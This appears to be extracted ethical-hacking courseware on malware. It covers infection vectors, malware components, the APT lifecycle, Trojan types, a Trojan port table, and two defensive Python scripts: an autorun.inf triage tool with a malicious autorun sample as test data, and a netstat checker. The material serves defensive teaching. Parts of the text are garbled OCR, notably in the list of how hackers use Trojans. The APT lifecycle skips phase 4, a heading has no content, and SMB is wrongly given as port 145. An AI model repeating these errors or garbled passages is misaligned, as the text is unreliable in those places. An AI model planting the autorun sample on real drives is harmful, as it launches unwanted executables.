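MALICIOUS_SAMPLE = "[autorun]\nopen=setup.exe\nicon=setup.exe\n"
# Constructed: a benign file that only labels the drive.
BENIGN_SAMPLE = "[AutoRun]\nlabel=Backup Drive\nicon=backup.ico\n"

if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, assess_autorun(sample) or ["no launch directives"])
    print("policy 0xFF disables all drives:", autoplay_off_for_all_drives(0xFF))
```

The parser is deliberately lenient (strict=False, no interpolation) because attacker-written .inf files are not tidy, and an exception in triage tooling is worse than an empty result. Checking the registry value as well as the policy complements the gpedit steps: the policy editor writes that value, so the function gives a scriptable confirmation that the setting actually applied.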
Browser and Email Software Bugs

Outdated web browsers often contain vulnerabilities that can pose a major risk to the user's computer. A visit to a malicious site from such browsers can automatically infect the machine without downloading or executing any program. The same scenario occurs while checking e-mail with Outlook Express or some other software with well-known problems. Again, it may infect the user's system without even downloading an attachment. To reduce such risks, always use the latest version of the browser and e-mail software.
Insecure Patch Management

Unpatched software poses a high risk. Users and IT administrators do not update their application software as often as they should, and many attackers take advantage of this well-known fact. Attackers can exploit insecure patch management by injecting the software with malware that can damage the data stored on the company's systems. This process can lead to extensive security breaches, such as stealing confidential files and company credentials. Some applications that were found to be vulnerable and were patched recently include Microsoft Office (CVE-2019-1084), Microsoft Exchange Server (CVE-2019-1136), .NET Framework (CVE-2019-1083), Microsoft Graphics Component (CVE-2019-1118), Docker flaw in Azure (CVE-2018-15664), Microsoft SQL Server RCE (CVE-2019-1068), and RDP RCE (CVE-2019-0887). Patch management must be effective in mitigating threats, and it is vital to apply patches and regularly update software programs.
Rogue/Decoy Applications

Attackers can easily lure a victim into downloading free applications/programs. If a free program claims to be loaded with features such as an address book, access to several POP3 accounts, and other functions, many users will be tempted to try it. POP3 (Post Office Protocol version 3) is an email transfer protocol.

If a victim downloads free programs and labels them as TRUSTED, protection software such as antivirus software will fail to indicate the use of new software. In this situation, an attacker receives an email, POP3 account passwords, cached passwords, and keystrokes through email without being noticed.

Attackers thrive on creativity. Consider an example in which an attacker creates a fake website (say, Audiogalaxy) for downloading MP3s. He or she could generate such a site using 15 GB of space for the MP3s and installing any other systems needed to create the illusion of a website. This can fool users into thinking that they are merely downloading from other network users. However, the software could act as a backdoor and infect thousands of naive users.
software before downloading them. Just because a website looks professional does not mean that it is safe.

- Always download popular software from its original (or officially dedicated mirror) site, and not from third-party sites with links to the (supposedly) same software.
File Sharing

If NetBIOS (Port 139), FTP (Port 21), SMB (Port 145), etc., on a system are open for file sharing or remote execution, they can be used by others to access the system. This can allow attackers to install malware and modify system files.
Common Techniques Attackers Use to Distribute Malware on the Web
Source: Security Threat Report (http://www.sophos.com)

Some standard techniques used to distribute malware on the web are as follows:

- Black Hat Search Engine Optimization (SEO): Black hat SEO (also referred to as unethical SEO) uses aggressive SEO tactics such as keyword stuffing, inserting doorway pages, page swapping, and adding unrelated keywords to get higher search engine rankings for malware pages.
- Social Engineered Click-jacking: Attackers inject malware into websites that appear legitimate to trick users into clicking them. When clicked, the malware embedded in the link executes without the knowledge or consent of the user.
- Compromised Legitimate Websites: Often, attackers use compromised websites to infect systems with malware. When an unsuspecting user visits the compromised website, he/she unknowingly installs the malware on his/her system, after which the malware performs malicious activities.
- Drive-by Downloads: This refers to the unintentional downloading of software via the Internet. Here, an attacker exploits flaws in browser software to install malware by merely visiting a website.
- Spam Emails: The attacker attaches a malicious file to an email and sends the email to multiple target addresses. The victim is tricked into clicking the attachment and thus executes the malware, thereby compromising his/her machine. This technique is the most common method currently in use by attackers. In addition to email attachments, an attacker may also use the email body to embed the malware.
Components of Malware
Malware authors and attackers create malware using components that can help them achieve their goals. They can use malware to steal information, delete data, change system settings, provide access, or merely multiply and occupy space. Malware is capable of propagating and functioning secretly.

Some essential components of most malware programs are as follows:

- Crypter: It is a software program that can conceal the existence of malware. Attackers use this software to elude antivirus detection. It protects malware from reverse engineering or analysis, thus making it difficult to detect by security mechanisms.
- Downloader: It is a type of Trojan that downloads other malware (or) malicious code and files from the Internet to a PC or device. Usually, attackers install a downloader when they first gain access to a system.
- Dropper: It is a covert carrier of malware. Attackers embed notorious malware files inside droppers, which can perform the installation task covertly. Attackers need to first install the malware program or code on the system to execute the dropper. The dropper can transport malware code and execute malware on a target system without being detected by antivirus scanners.
- Exploit: It is the part of the malware that contains code or a sequence of commands that can take advantage of a bug or vulnerability in a digital system or device. Attackers use such code to breach the system's security through software vulnerabilities to spy on information or to install malware. Based on the type of vulnerabilities abused, exploits are categorized into local exploits and remote exploits.
- Injector: This program injects exploits or malicious code available in the malware into other vulnerable running processes and changes the method of execution to hide or prevent its removal.
- Obfuscator: It is a program that conceals the malicious code of malware via various techniques, thus making it difficult for security mechanisms to detect or remove it.
- Packer: This software compresses the malware file to convert the code and data of the malware into an unreadable format. It uses compression techniques to pack the malware.
- Payload: It is the part of the malware that performs the desired activity when activated. It may be used for deleting or modifying files, degrading the system performance, opening ports, changing settings, etc., to compromise system security.
- Malicious Code: This is a piece of code that defines the basic functionality of the malware and comprises commands that result in security breaches. It can take the following forms:
  - Java Applets
  - ActiveX Controls
  - Browser Plug-ins
  - Pushed Content
Module Flow

APT Concepts
Advanced persistent threats are a major security concern for any organization, as they represent threats to the organization's assets, resources, financial records, and other confidential data. APT attacks can damage the reputation of an organization by revealing sensitive data. This section discusses APTs as well as their characteristics and lifecycle.
What are Advanced Persistent Threats?
An advanced persistent threat is defined as a type of network attack whereby an attacker gains unauthorized access to a target network and remains in the network without being detected for a long time. The word "advanced" signifies the use of techniques to exploit the underlying vulnerabilities in the system. The word "persistent" signifies the external command-and-control (C&C) system that continuously extracts the data and monitors the victim's network. The word "threat" signifies human involvement in coordination. APT attacks are highly sophisticated attacks whereby an attacker uses well-crafted malicious code along with a combination of multiple zero-day exploits to gain access to the target network. These attacks involve well-planned and coordinated techniques whereby attackers erase evidence of their malicious activities after their objectives have been fulfilled. APT attacks are usually performed on organizations possessing valuable information, such as financial, healthcare, defense and aerospace, manufacturing, and business organizations. The main objective of these attacks is to obtain sensitive information rather than sabotaging the organization and its network.

Information obtained by an attacker through APT attacks includes:

- Classified documents
- Transaction information
- User or customer's information
- Employee's personal information
- Organization's business strategy
- Network information
- Control system access information
Characteristics of Advanced Persistent Threats
APTs have various characteristics based on which attackers can design and plan their activities to launch an attack successfully. According to security researchers Dr. Max Kilger, Sean Bodmer, Jade Jones, and Gregory Carpenter, some key characteristics of APTs are as follows:
Objectives

The main objective of any APT attack is to repeatedly obtain sensitive information by gaining access to the organization's network for illegal earnings. Another objective of an APT may be spying for political or strategic goals.

Timeliness

It refers to the time taken by an attacker from assessing the target system for vulnerabilities to exploiting them to gain and maintain access to the target system.

Resources

Risk Tolerance

It is defined as the level up to which the attack remains undetected in the target network. APT attacks are well planned and executed with proper knowledge of the target network, which helps them remain undetected in the network for a long time.

Skills and Methods

These are the methods and tools used by attackers to perform a certain attack. The methods used for performing the attack include various social engineering techniques to gather information about the target, techniques to prevent detection by security mechanisms, and techniques to maintain access for a long time.

Actions

APT attacks follow a certain number of technical "actions" that make them different from other types of cyber-attacks. The main objective of such attacks is to maintain their presence in the victim's network for a long time and extract as much data as possible.

Attack Origination Points

They refer to the numerous attempts made to gain entry into the target network. Such points of entry can be used to gain access to the network and launch further attacks. To succeed in gaining initial access, the attacker needs to conduct exhaustive research to identify the vulnerabilities and gatekeeper functions in the target network.

Numbers Involved in the Attack

It is defined as the number of host systems involved in the attack. APT attacks are usually performed by a crime group or crime organization.

Knowledge Source

It is defined as the gathering of information through online sources about specific threats, which can be further exploited to perform certain attacks.
Multi-phased

One of the important characteristics of APTs is that they follow multiple phases to execute an attack. The phases followed by an APT attack are reconnaissance, access, discovery, capture, and data exfiltration.

Tailored to the Vulnerabilities

The malicious code used to execute APT attacks is designed and written such that it targets the specific vulnerabilities present in the victim's network.

Multiple Points of Entries

Once an adversary enters the target network, he/she establishes a connection with the server to download malicious code for further attacks. In the initial phase of an APT attack, the adversary creates multiple points of entry through the server to maintain access to the target network. If one point of entry is discovered and patched by the security analyst, then the adversary can use a different entry point.

Evading Signature-Based Detection Systems

APT attacks are closely related to zero-day exploits, which contain malware that has never been previously discovered or deployed. Thus, APT attacks can easily bypass security mechanisms such as firewalls, antivirus software, IDS/IPS, and email spam filters.

Specific Warning Signs

APT attacks are usually impossible to detect. However, some indications of an attack include inexplicable user account activities, the presence of a backdoor Trojan for maintaining access to the network, unusual file transfers and file uploads, unusual database activities, etc.
Advanced Persistent Threat Lifecycle

In the current threat landscape, organizations need to pay greater attention to APTs. APTs may target an organization's IT assets, financial assets, intellectual property, and reputation. Commonly used security and defensive controls will not suffice to prevent such attacks. Attackers behind such attacks adapt their TTPs based on the vulnerabilities and security posture of the target organization. Thus, they can evade the security controls of the target organization. To launch an APT attack, attackers follow a certain set of phases to target, penetrate, and exploit an organization's network. Attackers must follow each phase step by step to successfully compromise and gain access to the target system.

The various phases of the APT lifecycle are as follows:
1. Preparation

The first phase of the APT lifecycle is preparation, where an adversary defines the target, performs extensive research on the target, organizes a team, builds or attains tools, and performs tests for detection. APT attacks usually require a high level of preparation, as the adversary cannot risk detection by the target's network security. Additional resources and data may be necessary before carrying out the attack. An attacker needs to perform highly complex operations before executing the attack plan against the target organization.

2. Initial Intrusion

The next phase involves attempting to enter the target network. Common techniques used for an initial intrusion are sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Spear-phishing emails usually appear legitimate but they contain malicious links or attachments containing executable
malware. These malicious links can redirect the target to the website where the target's web browser and software are compromised by the attacker using various exploit techniques. Sometimes, an attacker may also use social engineering techniques to gather information from the target. After obtaining information from the target, attackers use such information to launch further attacks on the target network. In this phase, malicious code or malware is deployed into the target system to initiate an outbound connection.

3. Expansion

The primary objectives of this phase are expanding access to the target network and obtaining credentials. If the attacker's aim is to exploit and gain access to a single system, then there is no need for expansion. However, in most cases, the objective of an attacker is to access multiple systems using a single compromised system. In this scenario, the first step performed by an attacker after an initial compromise is to expand access to the target systems. The main objective of the attacker in this phase is to obtain administrative login credentials to escalate privileges and to gain further access to the systems in the network. For this purpose, the attacker tries to obtain administrative privileges for the initial target system from cached credentials and uses these credentials to gain and maintain access to other systems in the network. When attackers are unable to obtain valid credentials, they use other techniques such as social engineering, exploiting vulnerabilities, and distributing infected USB devices. After the attacker obtains the target's account credentials, it is difficult to track his/her movement in the network, as he/she uses a legitimate username and password.
5. Search and Exfiltration

In this phase, an attacker achieves the ultimate goal of network exploitation, which is generally to gain access to a resource that can be used for performing further attacks or using that resource for financial gain. In general, attackers target specific data or documents before launching an attack. However, in some cases, although attackers determine that crucial data are available in the target network, they are unaware of the location of the data. A common method for search and exfiltration is to steal all the data including important documents, emails, shared drives, and other types of data present on the target network. Data can also be gathered using automated tools such as network sniffers. Attackers use encryption techniques to evade data loss prevention (DLP) technologies in the target network.

6. Cleanup

This is the last phase, where an attacker performs certain actions to prevent detection and remove evidence of compromise. Techniques used by the attacker to cover his/her tracks include evading detection, eliminating evidence of intrusion, and hiding the target of the attack and attacker details. In some cases, these techniques also include manipulating the data in the target environment to mislead security analysts. It is imperative for attackers to make the system appear as it was before they gained access to it and compromised the network. Therefore, it is essential for an attacker to cover his/her tracks and remain undetected by security analysts. Attackers can change any file attributes back to their original state. Information listed, such as file size and date, is just attribute information contained in the file.
Figure 7.1: Advanced Persistent Threat Lifecycle (figure labels: Initial Intrusion, Expansion, Deployment of Persistence, Search and Exfiltration, Cleanup)
Module Flow

- Malware Concepts
- Fileless Malware Concepts
- Malware Analysis
- Trojan Concepts
- Countermeasures
- Virus and Worm Concepts
- Anti-Malware Software

Trojan Concepts
In this section, we will discuss the basic concepts of Trojans to understand various Trojans and backdoors as well as their impact on network and system resources. This section describes various Trojans and highlights their purpose, symptoms, and common ports used. It also discusses the methods adopted by attackers to install Trojans to infect target systems and perform malicious activities.
What is a Trojan?
According to ancient Greek mythology, the Greeks won the Trojan War with the aid of a giant wooden horse that was built to hide their soldiers. The Greeks left this horse in front of the gates of Troy. The Trojans thought that the horse was a gift from the Greeks, which they had left before apparently withdrawing from the war, and brought it into their city. At night, the Greek soldiers broke out of the wooden horse and opened the city gates to let in the rest of the Greek army, who eventually destroyed the city of Troy.

Inspired by this story, a computer Trojan is a program in which malicious or harmful code is contained inside an apparently harmless program or data, which can later gain control and cause damage, such as ruining the file allocation table on your hard disk. Attackers use computer Trojans to trick the victim into performing a predefined action. Trojans are activated upon users' specific predefined actions such as unintentionally installing a malicious software, clicking on a malicious link, etc., and upon activation, they can grant attackers unrestricted access to all the data stored on the compromised information system and cause potentially severe damage. For example, users could download a file that appears to be a movie, but, when executed, unleashes a dangerous program that erases the hard drive or sends credit card numbers and passwords to the attacker.

A Trojan is wrapped within or attached to a legitimate program, meaning that the program may have functionality that is not apparent to the user. Furthermore, attackers use victims as unwitting intermediaries to attack others. They can use a victim's computer to commit illegal DoS attacks.

Trojans work at the same level of privileges as the victims. For example, if a victim has privileges to delete files, transmit information, modify existing files, and install other programs (such as programs that provide unauthorized network access and execute privilege elevation attacks),
once the Trojan infects that system, it will possess the same privileges. Furthermore, it can attempt to exploit vulnerabilities to increase the level of access even beyond the user running it. If successful, the Trojan can use such increased privileges to install other malicious code on the victim's machine.

A compromised system can affect other systems on the network. Systems that transmit authentication credentials such as passwords over shared networks in cleartext or a trivially encrypted form are particularly vulnerable. If an intruder compromises a system on such a network, he or she may be able to record usernames and passwords or other sensitive information.

Additionally, a Trojan, depending on the actions it performs, may falsely implicate a remote system as the source of an attack by spoofing, thereby causing the remote system to incur a liability. Trojans enter the system by means such as email attachments, downloads, and instant messages.
Indications of Trojan Attack

The following computer malfunctions are indications of Trojan attack:

- The DVD-ROM drawer opens and closes automatically.
- The computer screen blinks, flips upside-down, or is inverted so that everything is displayed backward.
- The default background or wallpaper settings change automatically. This can be performed using pictures either on the user's computer or in the attacker's program.
- Printers automatically start printing documents.
- Web pages suddenly open without input from the user.
- The color settings of the operating system (OS) change automatically.
- Screensavers convert to a personal scrolling message.
- The sound volume suddenly fluctuates.
- Antivirus programs are automatically disabled, and the data are corrupted, altered, or deleted from the system.
- The date and time of the computer change.
- The mouse cursor moves by itself.
- The left- and right-click functions of the mouse are interchanged.
- The mouse pointer disappears completely.
- The mouse pointer automatically clicks on icons and is uncontrollable.
- The Windows Start button disappears.
- Pop-ups with bizarre messages suddenly appear.
- Clipboard images and text appear to be manipulated.
- The keyboard and mouse freeze.
- Contacts receive emails from a user's email address that the user did not send.
- Strange warnings or question boxes appear. Often, these are personal messages directed at the user, asking questions that require him/her to answer by clicking a Yes, No, or OK button.
- The system turns off and restarts in unusual ways.
- The taskbar disappears automatically.
- The Task Manager is disabled. The attacker or Trojan may disable the Task Manager function so that the victim cannot view the task list or end the task on a given program or process.

Figure 7.2: Diagram showing how the attacker extracts information from the victim's system
How Hackers Use Trojans
Attackers create malicious programs such as Trojans for the following purposes:

- Delete or replace OS's critical files
- Generate fake traffic to perform DoS attacks
- Record screenshots, audio, and video of victim's PC
- Use victim's PC for spamming and blasting email messages
- Download spyware, adware, and malicious files
- Disable firewalls and antivirus
- Create backdoors to gain remote access
- Infect the victim's PC as a proxy server for relaying attacks
- Use the victim's PC as a botnet to perform DDoS attacks
- Steal sensitive information such as:
  - Credit card information, which is useful for domain registration as well as for shopping using keyloggers
  - Account data such as email passwords, dial-up passwords, and web service passwords
  - Important company projects, including presentations and work-related papers
- Encrypt the victim's machine and prevent the victim from accessing the machine
- Use the target system as follows:
To store archives of illegal
materials,suchas childpornography. The target
continues usinghis/her
systemwithout realizing
that attackersa re usingit for illegal
activities
© AsanFTPserver for pirated software
Script
kiddiesmay justwant to havefun with the targetsystem; an attackercouldplant
a Trojani n the systemjust to makethe systemact strangely (e.g., the CD\DVD tray
andclosesfrequently,
‘opens the mouse functionsimproperly, etc.)
Theattackermight use a compromised systemfor other illegal
purposes suchthat the
targetwould be held responsible if theseillegalactivities are discovered by the
authorities
ical andCountermensores
Mackin ©by E-Comel
Copyright
Common Ports used by Trojans
Ports represent the entry and exit points of data traffic. There are two types of ports: hardware ports and software ports. Ports within the OS are software ports, and they are usually entry and exit points for application traffic (e.g., port 25 is associated with SMTP for e-mail routing between mail servers). Many existing ports are application-specific or process-specific. Various Trojans use some of these ports to infect target systems.
Users need a basic understanding of the state of an "active connection" and the ports commonly used by Trojans to determine whether a system has been compromised. Among the various states, the "listening" state is the important one in this context. The system generates this state when it listens on a port number while waiting for another system to connect. Whenever a system reboots, Trojans move to the listening state; some use more than one port: one for listening and the other(s) for data transfer. Common ports used by different Trojans are listed in the table below.
Note that a port number is only a weak indicator on its own: most of the families listed can be configured to use any port, and ports such as 80, 443, and 8080 carry legitimate traffic all day. A match in the table should therefore prompt inspection of the process that owns the socket rather than be taken as proof of compromise.
Port | Trojan
20/22/80/443 | Emotet
21 | Blade Runner, Doly Trojan, Invisible FTP, WebEx, Fore, WinCrash
21/3024/4092/5742 | WinCrash
22 | Shaft, Linux Rabbit, SSH RAT
23 | Tiny Telnet Server, EliteWrap
25 | Email Password Sender, Antigen, Terminator, WinPC, WinSpy, Haebu Coceda, Shtrilitz Stealth, KillerRat, Houdini RAT, Kuang2 0.17A-0.30, Jesrto, Lazarus Group, Mis-Type, Night Dragon
26 | BadPatch
31/456 | Hackers Paradise
53 | Denis, Ebury, FIN7, Lazarus Group, Threat Group-3390, RedLeaves, Tropic Trooper
80 | Codered, Necurs, Ismdoor, NetWire, PoisonIvy, Executer, APT18, APT19, APT32, BBSRAT, Calisto, Carbanak, Carbon, Comnie, Empire, FIN7, InvisiMole, Lazarus Group, MirageFox, Mis-Type, Misdat, Mivast, MoonWind, NetMonitor, Night Dragon, POWERSTATS, RedLeaves, S-Type, Threat Group-3390, UBoatRAT
443 | ADVSTORESHELL, APT3, APT29, APT33, AuditCred, BADCALL, BBSRAT, Bisonal, Biba, Carbanak, Cardinal RAT, Comnie, Derusbi, ELMER, Empire, FELIXROOT, FIN7, FIN8, ghOst RAT, HARDRAIN, Hi-Zor, HOPLIGHT, KEYMARBLE, LOWBALL, Lazarus Group, Misdat, Mis-Type, MoonWind, Naid, Nidiran, Pasam, PlugX, PowerDuke, POWERTON, Proxysvc, RATANKBA, RedLeaves, S-Type, TEMP.Veles, Threat Group-3390, TrickBot, Trooper, TYPEFRAME, UBoatRAT
445 | WannaCry, Petya, Dragonfly 2.0
555 | IniKiller, Phase Zero, Stealth Spy
666 | Satanz Backdoor, Ripper
1001 | Silencer, WebEx
1011 | Doly Trojan
1170 | Psyber Stream Server, Voice
1234/12345 | Valvoline, SubSeven 1.0-1.8
1243/6711/16776/27374 | SubSeven
1492 | FTP99CMP
1600 | Shivka-Burka
1604 | DarkComet RAT, Pandora RAT, HellSpy
1999 | Shockrave, BackDoor 1.00-1.03
2001 | Trojan Cow
2801 | Phineas Phucker
3131 | Subsari
3150 | The Invasor
3389 | RDP
3700/9872-9875/10067/10167 | Portal of Doom
4000 | RA
4567 | File Nail
4590 | ICQ Trojan
5000 | Bubbel, SpyGate RAT, Punisher RAT
5321 | Firehotcker
5400-02 | Blade Runner
5569 | Robo-Hack
6667/12349 | Bionet, Magic Hound
6670-71 | Deep Throat
6969 | GateCrasher, Priority
7000 | Remote Grab, Mspy
7300-08/31338 | NetMonitor, Shiver
7626 | TCP Wrappers Trojan
7789 | ICKiller
8080 | Zeus, APT37, Comnie, EvilGrab, FELIXROOT, FIN7, HTTPBrowser, Lazarus Group, Magic Hound, Oceansalt, S-Type, Shamoon, Volgmer, TYPEFRAME
8443 | Nidiran, FELIXROOT, TYPEFRAME
8787/54321 | BackOrifice 2000
10100 | Gift
11223 | Progenic Trojan
12223 | Hack'99 KeyLogger
12345-46 | GabanBus, NetBus
16969 | Priority
20034 | NetBus 2.0 Beta, 2.01
22222/33333 | Prosiak
22222 | Rux
25685 | Moon Pie
26274 | Delta
30100-02 | NetSphere 1.27a
31339 | NetSpy DK
31666 | BOWhack
34324 | BigGluck, TN
40421-26 | Masters Paradise
50766 | Fore
53001 | Remote Windows Shutdown
54321 | SchoolBus .69-1.11
61466 | Telecommando
65000 | Devil
Names from the table whose port column did not survive extraction of this page: Agent.BTZ/ComRat, JavaRAT, Adwind; BADCALL, Comnie, Volgmer; Ptakks; DarkFTP; Nuker; Alpha Gunner 0.80.
Table 7.2: Trojan and corresponding port of attack
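The check the text above describes, as an added example that is not code from the courseware: it parses a netstat-style socket listing and flags sockets in the listening state whose local port appears in a subset of Table 7.2. The port subset, the list of ports shared with legitimate services, and the sample listing are all assumptions constructed for the demonstration.

```python
"""Check a netstat-style socket listing against the Trojan port table.

Added example; it is not part of the courseware. TROJAN_PORTS is a hand-picked
subset of Table 7.2 and SAMPLE_NETSTAT is constructed input, so it runs offline.
"""
from typing import Dict, List, Tuple

# Subset of Table 7.2: listening port -> Trojan families historically bound to it.
TROJAN_PORTS: Dict[int, List[str]] = {
    21: ["Blade Runner", "Doly Trojan", "Invisible FTP", "WebEx", "Fore", "WinCrash"],
    22: ["Shaft", "Linux Rabbit", "SSH RAT"],
    1243: ["SubSeven"], 6711: ["SubSeven"], 27374: ["SubSeven"],
    1604: ["DarkComet RAT", "Pandora RAT"],
    12345: ["GabanBus", "NetBus"], 12346: ["GabanBus", "NetBus"],
    20034: ["NetBus 2.0"],
    54321: ["BackOrifice 2000", "SchoolBus"],
    65000: ["Devil"],
}

# Ports that legitimate services use all the time: a hit here is weak evidence by itself.
SHARED_SERVICE_PORTS = {21, 22, 23, 25, 53, 80, 443, 445, 3389, 8080, 8443}


def parse_netstat(text: str) -> List[dict]:
    """Parse `netstat -tulnp` (Linux) style lines; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or not parts[0].startswith(("tcp", "udp")):
            continue
        proto, local, remote = parts[0], parts[3], parts[4]
        rest = parts[5:]                       # TCP: [STATE, PID/name]; UDP: [PID/name]
        state = rest[0] if rest and "/" not in rest[0] and rest[0] != "-" else "-"
        program = next((p for p in rest if "/" in p), "-")
        host, _, port = local.rpartition(":")
        rows.append({"proto": proto, "host": host, "port": int(port),
                     "remote": remote, "state": state, "program": program})
    return rows


def suspicious_listeners(rows: List[dict]) -> List[Tuple[dict, List[str], str]]:
    """Return (row, trojan names, confidence) for every listener on a port in TROJAN_PORTS.

    Only sockets that accept connections count: TCP in LISTEN, or any bound UDP socket.
    Confidence is downgraded on shared service ports; in every case the owning
    program (and, on a real host, its binary hash and parent) must be checked by hand,
    because any of these families can be rebound to an arbitrary port.
    """
    hits = []
    for row in rows:
        accepting = row["state"] == "LISTEN" or row["proto"].startswith("udp")
        names = TROJAN_PORTS.get(row["port"])
        if accepting and names:
            confidence = "low" if row["port"] in SHARED_SERVICE_PORTS else "medium"
            hits.append((row, names, confidence))
    return hits


# Constructed sample: what `netstat -tulnp` might print on a Linux host.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      655/cupsd
tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN      4413/svchost
tcp        0      0 10.0.0.5:49152          203.0.113.9:443         ESTABLISHED 4413/svchost
udp        0      0 0.0.0.0:68              0.0.0.0:*                           540/dhclient
"""

if __name__ == "__main__":
    for row, names, confidence in suspicious_listeners(parse_netstat(SAMPLE_NETSTAT)):
        print(f"{row['proto']}/{row['port']} ({row['program']}): "
              f"{', '.join(names)} [confidence: {confidence}]")
```

On the sample input the sshd listener on 22 is reported with low confidence (the port is shared with a legitimate service), while the listener on 12345 owned by a process named svchost on a Linux host is the kind of finding that deserves a look at the binary behind it.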
Types of Trojans
Trojans are classified into many categories depending on the exploit functionality and targets. Some Trojan types are listed below:
1. Remote Access Trojans
2. Backdoor Trojans
3. Botnet Trojans
4. Rootkit Trojans
5. E-Banking Trojans
6. Point-of-Sale Trojans
7. Defacement Trojans
8. Service Protocol Trojans
9. Mobile Trojans
10. IoT Trojans
11. Security Software Disabler Trojans
12. Destructive Trojans
13. DDoS Attack Trojans
14. Command Shell Trojans
Remote Access Trojans
Remote access Trojans (RATs) provide attackers with full control over the victim's system, thereby enabling them to remotely access files, private conversations, accounting data, etc. The RAT acts as a server and listens on a port that is not supposed to be available to Internet attackers. Therefore, if the user is behind a firewall on the network, it is less likely that a remote attacker will connect to the Trojan, whereas attackers in the same network located behind the firewall can easily access the Trojan. This holds for RATs whose server component waits for an inbound connection; many modern RATs instead have the implant connect outward to the attacker's command-and-control server, which a firewall that permits outbound traffic does not stop.
Figure 7.3: Working of Remote Access Trojan
Attackers use RATs to infect the target machine to gain administrative access. RATs help an attacker to remotely access the complete GUI and control the victim's computer without his or her awareness. Moreover, they can perform screen and camera capture, code execution, keylogging, file access, password sniffing, registry management, and so on. They infect victims via phishing attacks and drive-by downloads, and they propagate through infected USB keys or networked drives. They can download and execute additional malware, execute shell commands, read and write registry keys, capture screenshots, log keystrokes, and spy on webcams.
njRAT
njRAT is a powerful data-stealing RAT with downloading capabilities. In addition to logging keystrokes, it can access a victim's camera, steal credentials stored in browsers, upload and download files, perform process and file manipulations, and view the victim's desktop.
This RAT can be used to control botnets (networks of computers), thereby allowing the attacker to update, uninstall, disconnect, restart, and close the RAT, and rename its campaign ID. The attacker can further create and configure the malware to spread through USB drives with the help of the command-and-control server software.
Features:
* Remotely access the victim's computer
* Collect the victim's information such as IP address, hostname, and OS
* Manipulate files and system files
* Open an active remote session providing the attacker access to the command line of the victim's machine
* Log keystrokes and steal credentials from browsers
Figure 7.4: Screenshot of njRAT
Some additional RATs are as follows:
* FlawedAmmyy
* MoSucker
* ProRat
* Theef
* Ismdoor
* Kedi RAT
* PCRat/Gh0st RAT
Backdoor Trojans
A backdoor is a program that can bypass the standard system authentication or conventional system mechanisms such as IDS and firewalls, without being detected. In these types of breaches, hackers leverage backdoor programs to access the victim's computer or network. The difference between this type of malware and other types of malware is that the installation of the backdoor is performed without the user's knowledge. This allows the attacker to perform any activity on the infected computer, such as transferring, modifying, or corrupting files, installing malicious software, and rebooting the machine, without user detection. Backdoors are used by attackers for uninterrupted access to the target machine. Most backdoors are used for targeted attacks. Backdoor Trojans are often used to group victim computers to form a botnet or zombie network that can be used to perform criminal activities.
Backdoor Trojans are often initially used in the second (point of entry) or third (command-and-control [C&C]) stage of the targeted attack process. The main difference between a RAT and a traditional backdoor is that the RAT has a user interface, i.e. the client component, which can be used by the attacker to issue commands to the server component residing in the compromised machine, whereas a backdoor does not.
For example, a hacker who is performing a malicious activity identifies vulnerabilities in a target network. The hacker implants the networkmonitor.exe backdoor in the target network, and the backdoor will be installed in a victim's machine on the target network without being detected.
PoisonIvy
Some variants of PoisonIvy copy themselves into an alternate data stream. A registry entry for the backdoor will be added to ensure that the backdoor is started every time the computer is booted up. The server then connects to a client using an address defined when the server part was created. The communication between the server and client programs is encrypted and compressed. PoisonIvy can be configured to inject itself into a browser process before making an outgoing connection to bypass firewalls.
Features:
* File modification, deletion, and transfer to and from the infected system
* Windows registry can be viewed and edited
Figure 7.5: Screenshot of PoisonIvy
Some additional backdoor Trojans are as follows:
* POWERSTATS
* ExtraPulsar backdoor
* RogueRobin
* ServHelper
* SpeakUp Linux backdoor
* Winnti
Botnet Trojans
Today, most major information security attacks involve botnets. Attackers (also known as "bot herders") use botnet Trojans to infect a large number of computers throughout a large geographical area to create a network of bots (or a "bot herd") that they control via a command-and-control (C&C) center. They trick regular computer users into downloading Trojan-infected files to their systems through phishing, SEO hacking, URL redirection, etc. Once the user downloads and executes this botnet Trojan in the system, it connects back to the attacker (traditionally over IRC channels; current botnets more often use HTTP(S), DNS, or peer-to-peer protocols) and waits for further instructions. Some botnet Trojans also have worm features and automatically spread to other systems in the network. They help an attacker to launch various attacks and perform nefarious activities such as DoS attacks, spamming, click fraud, and theft of application serial numbers, login IDs, and credit card numbers.
Figure 7.6: Functioning of Botnet
Necurs
The Necurs botnet is a distributor of many pieces of malware, most notably Dridex and Locky. It delivers some of the worst banking Trojans and ransomware threats in batches of millions of emails at a time, and it keeps reinventing itself. Necurs is distributed by spam e-mails and downloadable content from questionable/illegal sites. It is indirectly responsible for a significant portion of cyber-crime.
Features:
* Destruction of the system
* Turning a PC into a spying tool
* Electronic money theft and botnet mining
* Serving as a gateway for other viruses
Figure 7.7: Screenshot showing Necurs spam email tricking victim
Some additional botnet Trojans are as follows:
* Hide and Seek
* Ramnit
* Panda
* BetaBot
* Cridex
Rootkit Trojans
As the name indicates, "rootkit" consists of two terms, i.e., "root" and "kit." "Root" is a UNIX/Linux term that is the equivalent of "administrator" in Windows. The word "kit" denotes programs that allow someone to obtain root-/admin-level access to the computer by executing the programs in the kit. Rootkits are potent backdoors that specifically attack the root or OS. Unlike plain backdoors, rootkits hide their presence, so they cannot be detected simply by observing services, system task lists, or registries. Rootkits provide full control of the victim OS to the attacker. Rootkits cannot propagate by themselves, and this fact has precipitated a great deal of confusion. In reality, rootkits are just one component of what is called a blended threat. Blended threats typically consist of three snippets of code: dropper, loader, and rootkit. The dropper is the executable program or file that installs the rootkit. Activating the dropper program usually entails human intervention, such as clicking on a malicious e-mail link. Once initiated, the dropper launches the loader program and then deletes itself. Once active, the loader loads the rootkit into memory, typically by exploiting a vulnerability such as a buffer overflow to obtain the required privileges.
EquationDrug Rootkit
EquationDrug is a dangerous rootkit that attacks the Windows computer platform. It performs targeted attacks against various organizations and lands on the infected system by being downloaded and executed by the Trickler dubbed "DoubleFantasy," covered by TSL20110614-01 (Trojan.Win32.Micstus.A). It allows a remote attacker to execute shell commands on the infected system.
